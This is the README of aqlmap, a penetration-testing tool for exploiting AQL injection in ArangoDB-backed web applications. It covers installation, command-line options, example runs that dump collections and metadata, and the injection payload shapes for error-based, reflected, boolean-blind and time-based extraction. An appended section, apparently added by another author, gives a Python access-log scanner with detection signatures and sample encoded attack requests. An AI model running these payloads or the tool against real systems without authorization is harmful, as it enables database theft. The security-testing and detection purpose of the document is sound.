aqlmap

A command-line tool to extract information from ArangoDB through AQL (ArangoDB Query Language) injection vulnerabilities.

For more information, see Anvil's blog post Exploiting AQL Injection Vulnerabilities in ArangoDB.

Overview

aqlmap is a specialized tool designed for security researchers and penetration testers to exploit AQL injection flaws in web applications using ArangoDB as their database backend. The tool supports multiple extraction techniques and provides several options for fine-tuned exploitation.

Features

  • Multiple Extraction Techniques:

    • Error-based: Exploits verbose error messages to extract data
    • Reflected: Extracts data from successful responses (union-based style)
    • Blind: Boolean-based extraction using response pattern matching
    • Time-based: Measures response delays to extract information
  • Database Enumeration:

    • Extract database metadata (name, user, version)
    • List all collections
    • Count items in collections
    • Dump collection contents
  • Flexible Payload Injection:

    • Custom prefixes and suffixes for injection
    • Multiple encoding formats (JSON, URL-encoded, HTML-encoded, plaintext)
    • Support for HTTP proxies
    • Option to disable SSL/TLS certificate verification

Installation

Prerequisites

  • Python 3.7 or higher
  • pip (Python package manager)

From Source

git clone https://github.com/anvilsecure/aqlmap.git
cd aqlmap
pip install -e .

This installs aqlmap as a command-line tool that you can run from anywhere.

Quick Start

1. Create a Request File

Create a file containing the HTTP request you want to test (e.g., request.txt):

GET /api/search?q=test HTTP/1.1
Host: target.example.com
User-Agent: Mozilla/5.0
Accept: application/json

2. Run aqlmap

# Extract database metadata using error-based technique (default)
aqlmap -r request.txt -p q --db-info

# List all collections
aqlmap -r request.txt -p q --collections

# Dump collection contents
aqlmap -r request.txt -p q --collection users --dump

Usage Guide

Core Parameters

Required Arguments

-r, --request FILE          HTTP request file (required)
-p, --param PARAM_NAME      Parameter name to inject (required)

Database Operations

--db-info                   Extract database metadata (name, user, version)
--collections               List all collection names in the database
--count                     Count items in a collection (requires --collection)
--dump                      Dump items from a collection (requires --collection)
-c, --collection NAME       Collection name (used with --count and --dump)
--start INT                 Start position for dumping items (0-based)
--stop INT                  Stop position for dumping items (inclusive)

Extraction Techniques

--technique {error|reflected|blind|time}
                            Extraction technique to use (default: error)

Technique Details:

  • error (Default): Uses the AQL FAIL() function with markers to extract data from error messages

    aqlmap -r request.txt -p q --db-info --technique error
  • reflected: Extracts data from successful responses without error messages

    aqlmap -r request.txt -p q --db-info --technique reflected
  • blind: Boolean-based extraction requiring response pattern matching

    aqlmap -r request.txt -p q --db-info --technique blind \
      --string "SUCCESS" --not-string "FAILED"

    Parameters:

    • --string TEXT: String to match when query evaluates to True
    • --not-string TEXT: String to match when query evaluates to False
  • time: Measures response delays to extract information

    aqlmap -r request.txt -p q --db-info --technique time --delay 2.0

    Parameters:

    • --delay SECONDS: Delay in seconds for time-based extraction (default: 1.0, supports decimals like 0.5)

Injection Control

--prefix STRING             String to prepend before the AQL payload (e.g., "\" or ')
--suffix STRING             String to append after the AQL payload (e.g., ' or ""')
--input-encoding {json|urlencoded|plaintext}
                            Encoding format for payloads (default: json)
--output-encoding {json|plaintext|html}
                            Encoding format for responses (default: json)

Network Options

-u, --url BASE_URL          Base URL to use (overrides host from request file)
--proxy PROXY_URL           HTTP/HTTPS proxy (e.g., http://127.0.0.1:8080)
--no-verify-ssl             Disable SSL/TLS certificate verification

Other Options

-v, --verbose               Enable verbose output

Examples

Refer to the examples directory to run a self-hosted vulnerable application and exploit it.

In addition, below are some examples of how to use the tool with different arguments.

Example 1: Extract Database Metadata

aqlmap -r request.txt -p search_query --db-info

Output:

[*] Validating output encoding with canary test...
[+] Encoding validation passed
[*] Extracting database metadata...

[+] Database Metadata:
    Database: aql-injectable-db
    Username: root
    Version: 3.12.5

Example 2: List All Collections

aqlmap -r request.txt -p id --collections

Output:

[*] Validating output encoding with canary test...
[+] Encoding validation passed
[*] Extracting collection names...

[+] Collections (10):
    - _analyzers
    - _appbundles
    - _apps
    - _aqlfunctions
    - _frontend
    - _graphs
    - _jobs
    - _queues
    - external_users
    - internal_users

Example 3: Dump Collection Data

aqlmap -r request.txt -p product_id --collection products --dump --start 0 --stop 5

Example 4: Use Reflected Extraction

aqlmap -r request.txt -p q --db-info --technique reflected

Example 5: Use Time-Based Blind Extraction

aqlmap -r request.txt -p id --collections --technique time --delay 1.5 -v

Example 6: Use Boolean-Based Blind Extraction

aqlmap -r request.txt -p username --db-info --technique blind --string "Valid user" --not-string "Invalid user"

Example 7: Custom Injection with Prefix/Suffix

If the injection point needs surrounding syntax for the payload to form a valid query, wrap it with a prefix and suffix:

aqlmap -r request.txt -p query --db-info --prefix "' OR " --suffix " AND '2'=='1"

Example 8: With HTTP Proxy and Verbose Output

aqlmap -r request.txt -p q --collections -v --proxy http://127.0.0.1:8080

Request File Format

The request file should contain a valid HTTP request. Example:

GET /api/search?q=test HTTP/1.1
Host: target.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: application/json
Connection: close

For requests with a body (e.g., POST or PUT), include the headers, a blank line, and then the body:

POST /api/query HTTP/1.1
Host: target.example.com
Content-Type: application/json
Content-Length: 23

{"search":"test value"}

Supported ArangoDB Versions

  • Tested with ArangoDB 3.12.5 and 3.12.7-2.
  • Other versions, both newer and older, are expected to work as well.

How It Works

Error-Based Extraction

Uses the FAIL() function to force error messages:

FAIL(CONCAT("aqlmap-begin", CURRENT_DATABASE(), "aqlmap-end"))

The tool extracts data from the error response between the markers.

Reflected Extraction

Embeds the payload's result directly in a successful response, without triggering an error:

CONCAT("aqlmap-begin", CURRENT_DATABASE(), "aqlmap-end")

Blind Extraction

Uses boolean logic with response pattern matching:

IF(condition, string_that_appears_in_true_response, string_in_false_response)

Time-Based Extraction

Uses conditional sleep injection:

(condition ? FAIL(SLEEP(1.5)) : 0)

The tool measures response time to determine if the condition is true.
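For defenders, the following is an added example (not part of the aqlmap project) that turns the payload shapes described above into detection logic: it decodes the URL, HTML and JSON encodings the tool can emit and flags access-log requests whose parameters carry the markers or AQL functions used by each technique. The log lines, client address and signature names are constructed for this illustration.

```python
import html
import json
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit
# Signatures follow the payload shapes this README documents; a starting point to tune, not a full ruleset.
SIGNATURES = {
    "marker": re.compile(r"aqlmap-(?:begin|end)", re.I),
    "error": re.compile(r"\bFAIL\s*\(", re.I),
    "time": re.compile(r"\bSLEEP\s*\(\s*\d+(?:\.\d+)?\s*\)", re.I),
    "blind": re.compile(r"\bIF\s*\(.*?,.*?,", re.I | re.S),
    "metadata": re.compile(r"\b(?:CURRENT_DATABASE|CURRENT_USER|VERSION)\s*\(\s*\)", re.I),
}
LOG_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def normalize(value, rounds=3):
    """Peel URL/HTML encoding repeatedly (double encoding) and JSON escapes, so rules see what AQL sees."""
    current = value
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(current))
        if decoded == current:
            break
        current = decoded
    try:
        return json.loads(f'"{current}"')  # undo JSON escapes such as \" and \u0022
    except json.JSONDecodeError:  # raw quotes inside: not a JSON string fragment, keep as is
        return current

def classify(value):
    """Return the names of every signature that matches the decoded value."""
    decoded = normalize(value)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_access_log(lines):
    """Flag query-string parameters in combined-format access-log lines that carry AQL injection signatures."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for param, values in parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True).items():
                hits = set().union(*(classify(v) for v in values))  # parse_qs already URL-decoded once
                if hits:
                    findings.append({"client": m.group("client"), "param": param, "techniques": sorted(hits)})
    return findings
# Constructed sample lines: benign, single-encoded error-based, double-encoded time-based, '+'-encoded blind.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Mar/2025:10:15:32 +0000] "GET /api/search?q=laptop+bag HTTP/1.1" 200 512',
    '203.0.113.10 - - [12/Mar/2025:10:15:40 +0000] "GET /api/search?q=%22%20OR%20FAIL%28CONCAT%28%22aqlmap-begin%22%2C%20CURRENT_DATABASE%28%29%2C%20%22aqlmap-end%22%29%29 HTTP/1.1" 500 87',
    '203.0.113.10 - - [12/Mar/2025:10:15:41 +0000] "GET /api/search?q=%25281%2520%253D%253D%25201%2520%253F%2520FAIL%2528SLEEP%25281.5%2529%2529%2520%253A%25200%2529 HTTP/1.1" 200 512',
    '203.0.113.10 - - [12/Mar/2025:10:15:42 +0000] "GET /api/search?q=IF%28LENGTH%28CURRENT_DATABASE%28%29%29+%3E+5%2C+%22Valid+user%22%2C+%22Invalid+user%22%29 HTTP/1.1" 200 512',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags the last three lines only; for a real deployment, pair the time-based signature with the observed response latency and add the request body for POST endpoints.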

Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing for vulnerabilities.

License

GPL-3.0-or-later

Contributing

Contributions are welcome! Please feel free to submit pull requests or open issues for bugs and feature requests.
